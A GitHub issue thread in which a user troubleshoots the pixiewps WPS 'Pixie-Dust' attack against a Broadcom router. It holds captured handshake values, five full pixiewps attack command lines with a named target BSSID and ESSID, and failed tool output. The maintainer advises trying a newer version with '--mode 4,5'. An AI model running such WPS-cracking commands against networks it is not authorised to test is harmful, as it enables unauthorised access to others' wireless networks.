### ISSUE TITLE
One router succesfully got the key but the other one gives me error

### ISSUE THREAD

**Issue by moisesgl** [wiire/pixiewps#19]
there is a router that keeps giving me "Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes" and I found this issue that you somehow got the key, here: https://github.com/t6x/reaver-wps-fork-t6x/issues/35

should i paste the chain here or does this just means that my routers chipset is not supported?

I tried the reaver fork and also tried pixiewps and both give me the same errors.

**Comment by moisesgl** [comment]
this is what i get and all this gives me is 

[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 380 ms
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]


# Generated by Reaver 1.5.2

#!/usr/bin/env bash
# Target BSSID: 7C:B1:5D:EA:DB:3C
# Target ESSID: INFINITUMqcdd
# Target MANUFACTURER: Broadcom
# Target MODEL: Broadcom
# Target MODEL NUMBER: 123456

# PKE    : a9:7d:a3:d0:a4:fd:ba:3b:7e:75:87:d4:ec:1c:75:bd:94:b1:fb:36:88:3e:d1:95:f2:43:5d:64:e9:e2:5c:ec:97:d0:d5:55:c6:18:0a:5b:77:d7:65:3e:89:d4:ee:d6:bd:53:3f:00:cf:70:28:50:71:2e:b9:9a:d7:dd:e5:0c:a7:73:99:48:01:de:c5:31:98:7f:33:20:0d:2d:ab:26:94:49:fd:9d:8f:10:fd:07:07:ba:9f:48:83:5e:5b:85:27:ae:4a:8f:07:38:25:22:cb:33:6a:c3:99:c7:f1:85:1a:c2:f3:d8:af:d7:6b:a3:fd:33:46:7f:6b:26:3b:2b:2e:3e:99:29:e4:08:15:d5:3f:4f:c5:ce:d9:75:60:80:b6:81:48:fb:c2:44:54:4a:ba:ea:7a:2f:c0:1f:80:3d:d6:fb:a0:a2:59:9b:f8:06:39:a8:7d:bf:e9:be:39:34:d9:c9:b5:9b:c3:f4:a9:5e:fa:10:41:d5:cd:5b:0c:35
# PKR    : cc:7d:9f:1b:5d:eb:54:45:7e:ac:ee:c2:92:dc:c0:90:7b:65:ef:9e:84:44:86:f3:f4:7a:0a:53:e7:16:2d:d8:6b:9c:30:1e:19:ff:b5:9c:df:ec:aa:4f:be:3e:2d:c3:b8:26:af:c7:19:1a:4b:c6:08:81:6e:c4:61:43:2b:52:04:c6:d8:9e:98:f3:36:b5:87:35:be:dc:ec:30:f4:ce:a3:dd:5d:d1:14:c9:15:bf:f0:be:be:92:d9:58:8a:06:07:9e:26:79:a8:90:1f:08:55:46:73:b5:9d:ba:85:a7:ea:5a:40:e2:b8:54:65:a0:e9:10:0f:90:12:c1:f5:dd:83:bd:5c:68:c1:15:83:84:17:52:8f:d1:f0:c1:a7:5a:77:00:5b:c5:a5:d5:eb:e0:b3:fc:57:a4:eb:9d:db:87:f3:6e:99:11:27:6f:87:a6:c5:f9:52:aa:99:d1:4c:33:c9:46:70:fe:d9:8e:e3:6f:1d:1c:f2:6d:de:bc:53:da
# E-Hash1: 8b:36:c0:51:d6:dd:1c:59:2c:66:1c:06:b8:69:5e:14:2c:78:12:fb:5f:ce:11:8b:f0:db:14:71:51:ab:26:bf
# E-Hash2: 24:59:0d:86:52:56:da:b2:46:d0:43:c2:27:23:c3:2a:57:56:02:8d:9b:69:49:9f:e9:87:f8:ec:45:ea:eb:c5
# AuthKey: 37:3d:a6:40:bd:9e:69:17:83:43:fd:6e:d1:98:96:3a:af:3e:87:67:bb:da:fe:f3:0d:2e:fd:55:c2:c7:41:1f
# E-Nonce: da:9e:5d:f6:a3:23:91:d1:8c:ef:4b:bf:a5:48:05:7b

#-----Full command-----#
pixiewps -e a9:7d:a3:d0:a4:fd:ba:3b:7e:75:87:d4:ec:1c:75:bd:94:b1:fb:36:88:3e:d1:95:f2:43:5d:64:e9:e2:5c:ec:97:d0:d5:55:c6:18:0a:5b:77:d7:65:3e:89:d4:ee:d6:bd:53:3f:00:cf:70:28:50:71:2e:b9:9a:d7:dd:e5:0c:a7:73:99:48:01:de:c5:31:98:7f:33:20:0d:2d:ab:26:94:49:fd:9d:8f:10:fd:07:07:ba:9f:48:83:5e:5b:85:27:ae:4a:8f:07:38:25:22:cb:33:6a:c3:99:c7:f1:85:1a:c2:f3:d8:af:d7:6b:a3:fd:33:46:7f:6b:26:3b:2b:2e:3e:99:29:e4:08:15:d5:3f:4f:c5:ce:d9:75:60:80:b6:81:48:fb:c2:44:54:4a:ba:ea:7a:2f:c0:1f:80:3d:d6:fb:a0:a2:59:9b:f8:06:39:a8:7d:bf:e9:be:39:34:d9:c9:b5:9b:c3:f4:a9:5e:fa:10:41:d5:cd:5b:0c:35 -r cc:7d:9f:1b:5d:eb:54:45:7e:ac:ee:c2:92:dc:c0:90:7b:65:ef:9e:84:44:86:f3:f4:7a:0a:53:e7:16:2d:d8:6b:9c:30:1e:19:ff:b5:9c:df:ec:aa:4f:be:3e:2d:c3:b8:26:af:c7:19:1a:4b:c6:08:81:6e:c4:61:43:2b:52:04:c6:d8:9e:98:f3:36:b5:87:35:be:dc:ec:30:f4:ce:a3:dd:5d:d1:14:c9:15:bf:f0:be:be:92:d9:58:8a:06:07:9e:26:79:a8:90:1f:08:55:46:73:b5:9d:ba:85:a7:ea:5a:40:e2:b8:54:65:a0:e9:10:0f:90:12:c1:f5:dd:83:bd:5c:68:c1:15:83:84:17:52:8f:d1:f0:c1:a7:5a:77:00:5b:c5:a5:d5:eb:e0:b3:fc:57:a4:eb:9d:db:87:f3:6e:99:11:27:6f:87:a6:c5:f9:52:aa:99:d1:4c:33:c9:46:70:fe:d9:8e:e3:6f:1d:1c:f2:6d:de:bc:53:da -s 8b:36:c0:51:d6:dd:1c:59:2c:66:1c:06:b8:69:5e:14:2c:78:12:fb:5f:ce:11:8b:f0:db:14:71:51:ab:26:bf -z 24:59:0d:86:52:56:da:b2:46:d0:43:c2:27:23:c3:2a:57:56:02:8d:9b:69:49:9f:e9:87:f8:ec:45:ea:eb:c5 -a 37:3d:a6:40:bd:9e:69:17:83:43:fd:6e:d1:98:96:3a:af:3e:87:67:bb:da:fe:f3:0d:2e:fd:55:c2:c7:41:1f -n da:9e:5d:f6:a3:23:91:d1:8c:ef:4b:bf:a5:48:05:7b


# PKE    : 43:f2:3c:c8:1d:4c:bf:7c:35:58:10:e3:69:ec:c6:ce:01:26:5e:27:61:df:4e:79:82:8f:ef:09:03:b6:da:41:3f:df:b8:60:9c:14:04:e7:b2:a6:ee:bd:52:83:0b:39:62:68:ff:d6:83:2a:ea:2c:49:82:b6:fd:e5:4e:e1:67:67:bd:d5:9a:fa:21:ad:29:97:f0:13:d5:26:9e:15:97:5b:f7:2b:4f:b6:f0:d5:2e:b7:e5:08:99:49:e6:b0:4e:45:6b:29:bf:1e:71:55:80:9c:96:0c:ad:81:c9:7a:73:2d:d6:9d:c8:97:6f:21:1a:31:45:85:89:b5:56:6c:11:9f:b7:bd:f5:0a:dd:f3:b2:bf:66:0e:d3:df:1c:84:10:d6:e5:44:05:b3:06:da:59:3d:fa:fe:83:64:7f:03:2d:a1:71:97:c7:1f:8c:56:9b:df:08:2d:d4:84:82:21:01:d5:5b:d9:29:15:02:d5:91:94:23:f0:c8:85:37:16:44
# PKR    : 6c:e4:13:6b:bf:14:21:da:e9:a6:f6:87:a4:f0:69:c4:d6:36:e2:0c:9d:3c:e3:9e:61:c2:59:56:1e:89:03:d3:56:e5:0e:58:36:27:ca:e7:bf:fc:f9:90:0f:90:6e:6c:f5:ec:78:e4:8b:89:e3:59:e9:9c:f4:bb:05:64:e8:97:72:93:d6:17:0a:ee:19:e3:af:2e:c5:96:47:9a:d1:9e:5a:0d:ba:0a:67:c6:f0:be:81:79:56:fe:8c:70:e7:e1:f7:95:d6:e1:09:fe:af:66:05:46:ea:67:83:8a:73:2c:b9:c5:92:69:63:06:71:9f:90:36:0c:d8:f1:eb:03:3f:2f:a0:1f:21:67:e3:0c:91:84:47:8c:d1:ac:98:e1:f9:f0:4c:42:39:54:2f:93:92:b1:a7:3b:16:96:1d:d4:dc:dd:78:cb:cc:87:0e:50:55:83:70:0e:32:af:fd:3f:41:65:e7:cb:47:dd:d6:32:94:e4:aa:76:e5:b1:c0:0b:62
# E-Hash1: 8a:56:da:e0:80:fb:23:27:c6:c0:71:39:31:bb:32:47:59:e0:1a:8a:ec:fa:33:89:c8:4f:62:bf:3e:cc:7c:6e
# E-Hash2: 48:fe:c2:34:03:2e:89:35:d9:da:df:19:f0:a3:3f:3f:67:49:59:71:52:c1:93:03:f5:91:de:f7:b1:40:9c:9a
# AuthKey: f7:33:1a:a1:14:28:fe:d0:24:d4:2b:d9:7e:3a:6c:31:a7:dc:77:98:c2:24:95:c9:5e:f1:09:49:79:a2:5e:c4
# E-Nonce: 8a:b4:80:8a:32:31:70:6d:a0:51:9d:2b:fb:a5:26:ba

#-----Full command-----#
pixiewps -e 43:f2:3c:c8:1d:4c:bf:7c:35:58:10:e3:69:ec:c6:ce:01:26:5e:27:61:df:4e:79:82:8f:ef:09:03:b6:da:41:3f:df:b8:60:9c:14:04:e7:b2:a6:ee:bd:52:83:0b:39:62:68:ff:d6:83:2a:ea:2c:49:82:b6:fd:e5:4e:e1:67:67:bd:d5:9a:fa:21:ad:29:97:f0:13:d5:26:9e:15:97:5b:f7:2b:4f:b6:f0:d5:2e:b7:e5:08:99:49:e6:b0:4e:45:6b:29:bf:1e:71:55:80:9c:96:0c:ad:81:c9:7a:73:2d:d6:9d:c8:97:6f:21:1a:31:45:85:89:b5:56:6c:11:9f:b7:bd:f5:0a:dd:f3:b2:bf:66:0e:d3:df:1c:84:10:d6:e5:44:05:b3:06:da:59:3d:fa:fe:83:64:7f:03:2d:a1:71:97:c7:1f:8c:56:9b:df:08:2d:d4:84:82:21:01:d5:5b:d9:29:15:02:d5:91:94:23:f0:c8:85:37:16:44 -r 6c:e4:13:6b:bf:14:21:da:e9:a6:f6:87:a4:f0:69:c4:d6:36:e2:0c:9d:3c:e3:9e:61:c2:59:56:1e:89:03:d3:56:e5:0e:58:36:27:ca:e7:bf:fc:f9:90:0f:90:6e:6c:f5:ec:78:e4:8b:89:e3:59:e9:9c:f4:bb:05:64:e8:97:72:93:d6:17:0a:ee:19:e3:af:2e:c5:96:47:9a:d1:9e:5a:0d:ba:0a:67:c6:f0:be:81:79:56:fe:8c:70:e7:e1:f7:95:d6:e1:09:fe:af:66:05:46:ea:67:83:8a:73:2c:b9:c5:92:69:63:06:71:9f:90:36:0c:d8:f1:eb:03:3f:2f:a0:1f:21:67:e3:0c:91:84:47:8c:d1:ac:98:e1:f9:f0:4c:42:39:54:2f:93:92:b1:a7:3b:16:96:1d:d4:dc:dd:78:cb:cc:87:0e:50:55:83:70:0e:32:af:fd:3f:41:65:e7:cb:47:dd:d6:32:94:e4:aa:76:e5:b1:c0:0b:62 -s 8a:56:da:e0:80:fb:23:27:c6:c0:71:39:31:bb:32:47:59:e0:1a:8a:ec:fa:33:89:c8:4f:62:bf:3e:cc:7c:6e -z 48:fe:c2:34:03:2e:89:35:d9:da:df:19:f0:a3:3f:3f:67:49:59:71:52:c1:93:03:f5:91:de:f7:b1:40:9c:9a -a f7:33:1a:a1:14:28:fe:d0:24:d4:2b:d9:7e:3a:6c:31:a7:dc:77:98:c2:24:95:c9:5e:f1:09:49:79:a2:5e:c4 -n 8a:b4:80:8a:32:31:70:6d:a0:51:9d:2b:fb:a5:26:ba


# PKE    : b7:12:49:8b:a2:01:73:b2:27:f9:af:23:e7:d9:c9:c7:e5:7c:8e:4b:f5:ac:0c:64:15:46:e1:23:13:03:8e:cb:e3:08:32:9d:be:dc:e1:c5:40:8b:2a:9d:e5:90:ab:9d:ef:06:df:e2:29:ed:47:8d:5a:a1:dd:c5:ee:0d:c2:79:40:18:17:60:72:62:63:54:d3:e5:af:f5:d6:61:2d:45:58:e0:4d:b9:6a:63:42:9f:62:c7:89:4a:c8:84:32:63:38:bd:12:be:91:23:c5:13:1b:9c:74:1c:d1:04:06:ea:4e:0e:c1:b0:64:32:88:69:72:18:89:88:43:8c:55:f0:76:c8:9b:d2:ce:a6:dc:7a:0d:3f:b5:50:9c:27:0e:9a:25:f8:bd:43:f7:ae:61:1f:d3:72:46:d9:f3:a4:99:7d:83:8d:9f:92:18:d1:0f:23:dc:cb:71:0b:28:a1:af:a9:b7:fd:7b:23:28:f0:e6:6f:e0:4a:41:82:1a:44:52:5c
# PKR    : c5:22:d7:72:e2:f1:28:d4:ad:b6:ae:70:c1:8f:4f:89:a5:6c:99:42:25:02:ba:4f:71:98:59:2a:20:b1:ce:17:ab:68:51:d4:75:8c:5a:81:7a:38:a8:06:4c:43:d4:1a:4b:cd:b3:9c:04:fa:ed:9d:55:8b:a5:d8:ac:de:6a:5d:e6:14:08:4c:85:fe:50:e5:dd:b7:96:13:90:cb:96:15:6a:c6:da:b4:6a:c9:b7:46:62:95:72:8d:ee:99:74:9a:d9:5f:b5:25:66:e2:95:82:b4:09:36:cb:c3:ba:5a:9c:5c:ba:e7:eb:d8:d7:f4:61:e9:c0:6f:ec:56:4f:cd:21:c6:21:67:f7:7a:2c:2d:6c:7d:cf:51:9d:00:5f:af:95:82:01:d0:0d:5d:0b:80:76:73:6e:18:16:b8:b8:1c:64:f4:84:6f:8f:4f:01:3e:b4:07:e4:9a:71:95:d9:94:54:2c:16:5a:cb:7a:7c:dc:67:75:3f:96:b9:eb:ed:20:0f
# E-Hash1: fa:b9:bb:73:e0:9e:21:97:c2:e2:bf:d7:d4:9d:e2:5a:9a:11:67:d3:92:b6:69:32:f5:f2:00:9e:b3:d3:90:e0
# E-Hash2: 28:bf:32:ce:75:6d:36:66:34:a4:f3:51:26:0c:ce:a2:53:a1:78:6f:c4:f8:8b:f0:d3:cc:8a:af:d8:88:c2:45
# AuthKey: 26:9c:bf:2f:cb:2a:85:db:6f:b4:5a:a7:c5:6a:18:a4:01:9b:53:0c:ff:99:08:f4:a4:04:78:87:69:bc:16:1e
# E-Nonce: ef:e1:f5:c3:e2:8f:52:4c:3c:46:54:a7:76:6c:2a:4f

#-----Full command-----#
pixiewps -e b7:12:49:8b:a2:01:73:b2:27:f9:af:23:e7:d9:c9:c7:e5:7c:8e:4b:f5:ac:0c:64:15:46:e1:23:13:03:8e:cb:e3:08:32:9d:be:dc:e1:c5:40:8b:2a:9d:e5:90:ab:9d:ef:06:df:e2:29:ed:47:8d:5a:a1:dd:c5:ee:0d:c2:79:40:18:17:60:72:62:63:54:d3:e5:af:f5:d6:61:2d:45:58:e0:4d:b9:6a:63:42:9f:62:c7:89:4a:c8:84:32:63:38:bd:12:be:91:23:c5:13:1b:9c:74:1c:d1:04:06:ea:4e:0e:c1:b0:64:32:88:69:72:18:89:88:43:8c:55:f0:76:c8:9b:d2:ce:a6:dc:7a:0d:3f:b5:50:9c:27:0e:9a:25:f8:bd:43:f7:ae:61:1f:d3:72:46:d9:f3:a4:99:7d:83:8d:9f:92:18:d1:0f:23:dc:cb:71:0b:28:a1:af:a9:b7:fd:7b:23:28:f0:e6:6f:e0:4a:41:82:1a:44:52:5c -r c5:22:d7:72:e2:f1:28:d4:ad:b6:ae:70:c1:8f:4f:89:a5:6c:99:42:25:02:ba:4f:71:98:59:2a:20:b1:ce:17:ab:68:51:d4:75:8c:5a:81:7a:38:a8:06:4c:43:d4:1a:4b:cd:b3:9c:04:fa:ed:9d:55:8b:a5:d8:ac:de:6a:5d:e6:14:08:4c:85:fe:50:e5:dd:b7:96:13:90:cb:96:15:6a:c6:da:b4:6a:c9:b7:46:62:95:72:8d:ee:99:74:9a:d9:5f:b5:25:66:e2:95:82:b4:09:36:cb:c3:ba:5a:9c:5c:ba:e7:eb:d8:d7:f4:61:e9:c0:6f:ec:56:4f:cd:21:c6:21:67:f7:7a:2c:2d:6c:7d:cf:51:9d:00:5f:af:95:82:01:d0:0d:5d:0b:80:76:73:6e:18:16:b8:b8:1c:64:f4:84:6f:8f:4f:01:3e:b4:07:e4:9a:71:95:d9:94:54:2c:16:5a:cb:7a:7c:dc:67:75:3f:96:b9:eb:ed:20:0f -s fa:b9:bb:73:e0:9e:21:97:c2:e2:bf:d7:d4:9d:e2:5a:9a:11:67:d3:92:b6:69:32:f5:f2:00:9e:b3:d3:90:e0 -z 28:bf:32:ce:75:6d:36:66:34:a4:f3:51:26:0c:ce:a2:53:a1:78:6f:c4:f8:8b:f0:d3:cc:8a:af:d8:88:c2:45 -a 26:9c:bf:2f:cb:2a:85:db:6f:b4:5a:a7:c5:6a:18:a4:01:9b:53:0c:ff:99:08:f4:a4:04:78:87:69:bc:16:1e -n ef:e1:f5:c3:e2:8f:52:4c:3c:46:54:a7:76:6c:2a:4f


# PKE    : ad:7f:7f:c2:86:ba:59:e4:43:75:23:b8:d0:74:19:ae:07:d8:0b:73:96:2c:e5:8f:10:c6:a1:d4:65:37:b0:9f:14:5d:d6:ac:be:24:58:2c:45:0c:79:dc:5b:48:06:8a:38:3e:d5:24:cd:a3:48:f8:1c:97:96:b5:84:04:25:b0:a6:72:cb:b3:fe:fe:c4:ef:62:56:b1:3e:48:45:d1:46:f4:69:81:f8:13:77:37:c6:20:73:dc:94:8d:10:18:ae:bd:f6:81:c7:c7:6a:a0:b0:da:9b:b9:2f:bd:00:d8:2e:e2:0d:45:9e:27:5a:69:55:04:a3:ce:d5:fb:df:fe:ca:96:15:df:44:f6:16:e1:c1:40:4a:69:ff:1d:60:77:da:9a:02:65:d8:50:88:7d:c3:71:27:79:bb:c6:ef:b6:55:33:d9:4d:03:6f:31:5b:84:aa:51:a6:08:60:33:5b:6f:fa:a4:74:ae:0a:65:1d:0a:32:e5:24:4c:73:a3:64:8b
# PKR    : 08:0a:dd:5c:a8:9c:6e:57:ed:46:2f:87:fe:48:89:c4:a7:91:3a:f5:11:c2:10:da:5e:49:9c:dd:de:8b:10:37:64:7d:6c:ca:bf:8c:32:93:49:df:b6:85:a4:68:e2:30:b2:2b:65:68:9b:c4:73:b0:6c:67:ac:71:14:39:bb:a3:07:d2:50:e2:e1:d6:96:a4:79:cc:0f:e9:39:2b:44:cc:2d:a7:21:93:bb:40:be:41:75:78:03:97:5e:ef:7b:b3:d3:0d:d0:0c:9e:48:34:66:3a:5b:64:a5:4d:23:00:7d:00:9b:6d:f5:5d:33:93:10:a1:fb:3f:b0:27:80:56:81:9c:f7:e9:ea:96:0b:ec:45:9b:d0:5c:a1:1b:3c:6e:b3:40:e9:69:d6:98:f9:27:9f:a3:9a:70:c6:d9:82:ad:57:fd:fe:51:eb:4b:88:c5:55:c2:50:d3:0c:fe:d9:0f:9c:70:e7:ba:19:6c:b5:f9:fe:54:d5:8e:30:49:da:c6:09
# E-Hash1: c4:9a:93:16:b1:6c:94:fa:b6:11:69:c8:f7:4e:dd:81:bc:d6:0d:e4:a3:df:5c:f6:53:75:67:74:48:d7:af:a4
# E-Hash2: 8b:44:b6:b4:d9:40:09:90:c5:0a:cd:20:48:f5:f3:46:54:5a:01:53:6d:cb:86:06:8f:b7:ac:a1:39:4c:90:e1
# AuthKey: 45:36:3d:97:00:eb:ed:25:0e:7f:6d:2a:25:6b:18:81:28:3d:c5:2b:c7:61:5d:ad:4b:b4:b3:a4:17:15:1f:54
# E-Nonce: cd:42:8a:f9:a0:16:f3:1d:58:43:71:51:dd:ab:c8:72

#-----Full command-----#
pixiewps -e ad:7f:7f:c2:86:ba:59:e4:43:75:23:b8:d0:74:19:ae:07:d8:0b:73:96:2c:e5:8f:10:c6:a1:d4:65:37:b0:9f:14:5d:d6:ac:be:24:58:2c:45:0c:79:dc:5b:48:06:8a:38:3e:d5:24:cd:a3:48:f8:1c:97:96:b5:84:04:25:b0:a6:72:cb:b3:fe:fe:c4:ef:62:56:b1:3e:48:45:d1:46:f4:69:81:f8:13:77:37:c6:20:73:dc:94:8d:10:18:ae:bd:f6:81:c7:c7:6a:a0:b0:da:9b:b9:2f:bd:00:d8:2e:e2:0d:45:9e:27:5a:69:55:04:a3:ce:d5:fb:df:fe:ca:96:15:df:44:f6:16:e1:c1:40:4a:69:ff:1d:60:77:da:9a:02:65:d8:50:88:7d:c3:71:27:79:bb:c6:ef:b6:55:33:d9:4d:03:6f:31:5b:84:aa:51:a6:08:60:33:5b:6f:fa:a4:74:ae:0a:65:1d:0a:32:e5:24:4c:73:a3:64:8b -r 08:0a:dd:5c:a8:9c:6e:57:ed:46:2f:87:fe:48:89:c4:a7:91:3a:f5:11:c2:10:da:5e:49:9c:dd:de:8b:10:37:64:7d:6c:ca:bf:8c:32:93:49:df:b6:85:a4:68:e2:30:b2:2b:65:68:9b:c4:73:b0:6c:67:ac:71:14:39:bb:a3:07:d2:50:e2:e1:d6:96:a4:79:cc:0f:e9:39:2b:44:cc:2d:a7:21:93:bb:40:be:41:75:78:03:97:5e:ef:7b:b3:d3:0d:d0:0c:9e:48:34:66:3a:5b:64:a5:4d:23:00:7d:00:9b:6d:f5:5d:33:93:10:a1:fb:3f:b0:27:80:56:81:9c:f7:e9:ea:96:0b:ec:45:9b:d0:5c:a1:1b:3c:6e:b3:40:e9:69:d6:98:f9:27:9f:a3:9a:70:c6:d9:82:ad:57:fd:fe:51:eb:4b:88:c5:55:c2:50:d3:0c:fe:d9:0f:9c:70:e7:ba:19:6c:b5:f9:fe:54:d5:8e:30:49:da:c6:09 -s c4:9a:93:16:b1:6c:94:fa:b6:11:69:c8:f7:4e:dd:81:bc:d6:0d:e4:a3:df:5c:f6:53:75:67:74:48:d7:af:a4 -z 8b:44:b6:b4:d9:40:09:90:c5:0a:cd:20:48:f5:f3:46:54:5a:01:53:6d:cb:86:06:8f:b7:ac:a1:39:4c:90:e1 -a 45:36:3d:97:00:eb:ed:25:0e:7f:6d:2a:25:6b:18:81:28:3d:c5:2b:c7:61:5d:ad:4b:b4:b3:a4:17:15:1f:54 -n cd:42:8a:f9:a0:16:f3:1d:58:43:71:51:dd:ab:c8:72


# PKE    : f6:42:ae:6e:05:fa:ed:20:06:f1:0e:19:87:b3:5e:19:be:92:11:af:d9:05:c8:8c:23:c0:90:04:8c:a9:86:0e:2f:99:09:cc:83:dd:b0:a2:f8:73:b6:a9:12:eb:e9:48:65:34:0d:7c:5b:70:a8:a3:bd:0f:d3:14:7a:10:ab:cc:23:a7:85:e8:3c:90:8d:12:c2:79:6d:0c:54:c9:39:47:94:6c:af:3e:08:8d:14:63:0a:21:a8:93:02:4d:ff:e8:6e:6e:d6:37:45:6b:ea:05:ab:1f:d9:26:33:21:f9:72:a0:88:bf:9c:de:ed:eb:26:6b:7e:6c:c8:d2:a6:93:75:98:4d:af:2c:77:03:2c:67:bc:01:dd:25:45:2a:c0:21:a3:2a:7a:00:d2:20:ec:84:ab:7f:21:6b:d9:67:4c:b5:46:fd:03:14:63:59:c9:83:d6:02:22:77:bd:37:f0:39:0f:61:f2:28:26:81:8f:44:51:ca:ab:7f:14:d6:e3:c4
# PKR    : 8d:e0:3d:b5:95:25:22:f8:31:82:e6:34:15:cb:6f:d4:13:db:0e:4b:a3:45:7c:c5:19:18:9c:15:d0:7e:a2:94:d3:fd:d6:ab:f6:1d:6b:88:14:a4:c6:4d:0c:69:48:7f:27:72:39:d9:a3:fc:c4:48:8f:d6:c9:bf:33:07:ed:cf:d2:e0:6e:18:d9:ac:07:6d:45:78:25:37:cd:6d:5d:e4:24:42:be:aa:5c:a9:b2:cf:98:3f:57:45:b0:ca:28:59:0d:5e:80:79:37:36:44:2f:af:0e:ad:f7:03:97:49:d2:1b:ad:58:81:15:2f:d0:9f:ec:9b:46:c5:8d:34:ad:c3:ed:d7:69:2c:79:b8:1c:74:6b:93:e6:3a:4b:08:50:7b:f7:a6:63:bb:03:87:ba:21:fb:b3:2c:5e:c4:3c:e6:5b:53:29:a5:df:f1:7f:bc:0f:43:b8:e8:22:6a:89:ee:99:d8:54:44:d0:56:e1:76:b5:59:db:7c:3d:ec:7c:75:1f
# E-Hash1: 8e:92:7f:4a:40:84:20:66:bb:26:f6:fc:53:3e:d7:ac:90:38:2d:68:a0:40:fd:f9:2a:0b:e9:19:45:6f:2d:80
# E-Hash2: d8:08:90:e2:2d:c3:94:56:03:87:53:c1:f5:05:5c:8e:f6:9c:a6:51:b4:49:4a:52:5b:29:b2:5f:56:4e:37:0d
# AuthKey: c7:32:ca:f7:65:aa:36:02:4a:7a:00:c6:34:52:59:08:fa:d1:c4:90:70:23:10:f2:70:8f:b8:f5:a6:61:d0:7e
# E-Nonce: 81:1e:c5:55:79:95:5d:7e:47:fa:b5:34:e9:93:8e:74

#-----Full command-----#
pixiewps -e f6:42:ae:6e:05:fa:ed:20:06:f1:0e:19:87:b3:5e:19:be:92:11:af:d9:05:c8:8c:23:c0:90:04:8c:a9:86:0e:2f:99:09:cc:83:dd:b0:a2:f8:73:b6:a9:12:eb:e9:48:65:34:0d:7c:5b:70:a8:a3:bd:0f:d3:14:7a:10:ab:cc:23:a7:85:e8:3c:90:8d:12:c2:79:6d:0c:54:c9:39:47:94:6c:af:3e:08:8d:14:63:0a:21:a8:93:02:4d:ff:e8:6e:6e:d6:37:45:6b:ea:05:ab:1f:d9:26:33:21:f9:72:a0:88:bf:9c:de:ed:eb:26:6b:7e:6c:c8:d2:a6:93:75:98:4d:af:2c:77:03:2c:67:bc:01:dd:25:45:2a:c0:21:a3:2a:7a:00:d2:20:ec:84:ab:7f:21:6b:d9:67:4c:b5:46:fd:03:14:63:59:c9:83:d6:02:22:77:bd:37:f0:39:0f:61:f2:28:26:81:8f:44:51:ca:ab:7f:14:d6:e3:c4 -r 8d:e0:3d:b5:95:25:22:f8:31:82:e6:34:15:cb:6f:d4:13:db:0e:4b:a3:45:7c:c5:19:18:9c:15:d0:7e:a2:94:d3:fd:d6:ab:f6:1d:6b:88:14:a4:c6:4d:0c:69:48:7f:27:72:39:d9:a3:fc:c4:48:8f:d6:c9:bf:33:07:ed:cf:d2:e0:6e:18:d9:ac:07:6d:45:78:25:37:cd:6d:5d:e4:24:42:be:aa:5c:a9:b2:cf:98:3f:57:45:b0:ca:28:59:0d:5e:80:79:37:36:44:2f:af:0e:ad:f7:03:97:49:d2:1b:ad:58:81:15:2f:d0:9f:ec:9b:46:c5:8d:34:ad:c3:ed:d7:69:2c:79:b8:1c:74:6b:93:e6:3a:4b:08:50:7b:f7:a6:63:bb:03:87:ba:21:fb:b3:2c:5e:c4:3c:e6:5b:53:29:a5:df:f1:7f:bc:0f:43:b8:e8:22:6a:89:ee:99:d8:54:44:d0:56:e1:76:b5:59:db:7c:3d:ec:7c:75:1f -s 8e:92:7f:4a:40:84:20:66:bb:26:f6:fc:53:3e:d7:ac:90:38:2d:68:a0:40:fd:f9:2a:0b:e9:19:45:6f:2d:80 -z d8:08:90:e2:2d:c3:94:56:03:87:53:c1:f5:05:5c:8e:f6:9c:a6:51:b4:49:4a:52:5b:29:b2:5f:56:4e:37:0d -a c7:32:ca:f7:65:aa:36:02:4a:7a:00:c6:34:52:59:08:fa:d1:c4:90:70:23:10:f2:70:8f:b8:f5:a6:61:d0:7e -n 81:1e:c5:55:79:95:5d:7e:47:fa:b5:34:e9:93:8e:74

**Comment by moisesgl** [comment]
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 380 ms
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]

**Comment by wiire** [comment]
Most likely not supported. Try with the new version (https://github.com/wiire/pixiewps/commit/32091e45eea4d0e287cf3ff339f4f905d18753f8) and use `--mode 4,5`.

**Comment by moisesgl** [comment]
old chains gave me this:

 Pixiewps 1.2

 [-] WPS pin not found!

 [*] Time taken: 37 s 780 ms


are this time sensitive chains to test with --mode 4,5? should i get new ones? im not home to test it with home router but ill get to it tomorrow with new chains just in case.

**Comment by wiire** [comment]
No, time is not used with 4 and 5.
